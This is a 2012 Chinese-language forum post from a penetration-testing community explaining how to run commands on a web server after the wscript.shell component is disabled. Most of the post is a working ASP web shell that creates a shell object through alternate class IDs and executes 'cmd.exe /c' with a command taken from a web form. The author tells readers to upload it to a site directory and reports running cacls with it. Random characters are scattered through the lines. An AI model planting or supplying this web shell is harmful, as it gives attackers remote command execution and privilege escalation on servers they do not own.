中国网络渗透测试联盟

标题: wscript.shell删除解决办法 [打印本页]

作者: admin    时间: 2012-9-15 14:36
标题: wscript.shell删除解决办法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。( x7 g8 J1 H2 S. P) u
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。6 r# k, h. V2 [, K! Z
要想让运行命令可以试试这种方法,成功率为五五之数。" N9 i7 y) B0 ]1 Z+ A% A1 `9 m
把下面代码复制:
* u* r0 Q  c8 j  k  j<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>5 ^* @' s* g0 w$ \9 p  L  L# U
<%if err then%>
) @/ r1 T: K6 u' r  h<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>, _* u( A0 Y+ R  @  [
<%9 |$ I+ ?: Z- \* G; ~) t: a7 o/ W2 D
end if
3 W3 L& l8 I4 @2 jresponse.write("<textarea readonly cols=80 rows=20>"). d4 K1 }- \5 T# K8 x+ F% W) z5 @
On Error Resume Next
2 u+ e( E: Z- D! z2 H; c1 S0 Hresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall" S2 m% s2 d% o# r4 O
response.write("</textarea>")) N1 t4 y' ]" `/ ?/ R! V
response.write("<form method='post'>")
* n6 G+ Y* a$ Q4 U8 fresponse.write("<input type=text name='c' size=60><br>")
+ ]# l" Q4 [" a2 B/ aresponse.write("<input type=submit value='执行'></form>")
# @+ y" d! {; F: r7 m%>
  P, e: V9 r7 i
$ B; l. r* `+ m/ }保存为一个asp文件,然后传到网站目录上去7 D) O0 z1 p$ a) o) F
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。, |% ?7 R" Z0 g( _
我用此成功运行过cacls命令。
/ |9 Z- Q6 V: N  w: R5 ~3 C% y! x
" Z+ D2 E( x6 |$ i; |第二那就是运行时出错,可能限制某些代码执行




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2